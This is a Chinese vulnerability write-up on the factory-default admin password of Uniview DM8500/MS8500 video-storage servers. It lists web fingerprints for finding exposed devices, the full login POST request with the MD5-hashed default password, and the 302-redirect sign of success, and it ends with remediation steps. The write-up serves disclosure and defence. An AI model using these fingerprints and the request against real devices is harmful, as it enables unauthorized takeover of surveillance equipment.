宇视科技数据管理服务器默认口令漏洞复现

Wayyt  2小时前

宇视科技数据管理服务器默认口令漏洞复现

0x00 漏洞概述

宇视科技(Uniview)数据管理服务器是面向视频监控场景的存储与数据管理设备(已知型号涉及 DM8500、MS8500 系列),提供 Web 管理界面 /webui/ 用于设备配置与运维。该设备存在默认口令问题:内置管理员账号 admin 的出厂密码为 123456。攻击者使用默认凭证即可登入设备管理界面,查看设备信息、篡改系统设置、管理用户账户,甚至建立隐藏账户长期驻留监控,进而控制整个服务器,影响用户业务的连续性与数据安全。素材给出的风险评分为 8.0。

0x01 影响范围

公开渠道未能检索到该产品受影响版本的权威清单,厂商公告中亦未见对应条目,具体版本边界无法确认(推断:该问题源于出厂默认口令未被强制修改,凡部署后未更改默认密码的数据管理服务器均受影响,最终以官方说明为准)。

资产识别方面,该设备的 Web 管理界面具有多项指纹特征:页面标题为 数据管理服务器;页面引用 /webui/switch.php 路径;页面源码包含 cur_type="DEVTYPE_MS8500"cur_type="DEVTYPE_DM8500" 字样,以及 value=DEVTYPE_DM8500 selected>DM8500 选项文本。历史漏洞记录显示其管理端口常见为 8080(推断,依据早期公开漏洞记录的描述),默认亦可能运行于 80 端口。命中上述特征的站点,若管理界面暴露在公网或第三方可达网络中,即应纳入排查范围。

0x02 漏洞分析

该设备后台登录入口为 /webui/login.php,以表单方式提交认证信息,包含三个字段:username 为登录用户名;passwd 为登录密码,但并非明文,而是密码的 MD5 十六进制摘要(123456 对应 e10adc3949ba59abbe56e057f20f883e);hideWeakPasswd 取值 2,与弱口令提示的展示控制相关。

弱口令风险由三方面叠加构成。其一是默认凭证:出厂账号 admin/123456 与该厂商众多安防终端产品的出厂习惯一致,攻击者极易获得候选凭证。其二是接口防护缺失:登录请求无验证码字段,允许对登录接口进行凭证尝试。其三是登录成功的判定信号明确:认证通过时服务端返回 302 跳转,且响应头中携带目标页面 dmfr ame.php(管理主框架页),这一响应特征使自动化验证的结果判定非常直接。

整体验证路径为:向 /webui/login.php 提交默认凭证表单,依据「302 状态码 + 响应头含 dmfr ame.php」双条件确认登录成功,随后即持有管理员会话,可执行查看设备信息、修改系统设置、用户管理等后台操作。

0x03 利用链与请求包

利用过程只有一个请求。向目标登录接口提交默认凭证表单(Host 以 192.0.2.10 示意,端口以 8080 示意):

POST /webui/login.php HTTP/1.1
Host: 192.0.2.10:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36
Accept: text/html,application/xhtml+xm l,application/xm l;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ko;q=0.8
Content-Length: 71
Connection: close

username=admin&passwd=e10adc3949ba59abbe56e057f20f883e&hideWeakPasswd=2

请求体三个字段的含义:username 填默认用户名 adminpasswd 填默认密码 123456 的 MD5 摘要;hideWeakPasswd 固定填 2

响应判定标准为两条同时满足:HTTP 状态码等于 302,且响应头包含 dmfr ame.php。命中即代表默认凭证有效、登录成功,攻击者由此进入设备管理主框架页。验证脚本中同时使用了将凭证内嵌于 URL 的等价访问形式 http://admin:123456@192.0.2.10:8080/webui/login.php(此为脚本构造逻辑,实际会话维持方式可能随固件版本不同而存在差异,属推断)。

需要说明的是,该漏洞本质是「默认凭证 + 管理面暴露」的组合风险,不涉及内存破坏或认证逻辑绕过;上述请求与判定内容均依据验证脚本构造逻辑整理,属可复算的预期结果,实际响应格式可能因固件版本不同而略有差异。

0x04 检测与修复建议

1. 立即修改默认管理员密码,新密码应包含大小写字母、数字和特殊字符,且长度不小于 12 位;排查同一管理密码是否在其他设备复用。

2. 禁止将管理界面暴露到公网,通过防火墙或访问控制策略限制 /webui/ 的访问来源,管理流量收敛至运维专网。

3. 谨慎启用自定义工具等高权限功能,限制可执行代码的权限。

4. 启用操作日志审计,记录所有管理操作和 API 调用;定期检查用户账户列表,关注是否存在可疑新增账户,发现异常登录后及时轮换凭据并复核配置。

0x05 参考资料

1. NoSec 漏洞详情页:https://nosec.org/home/detail/6068.html

最新评论

昵称
邮箱
提交评论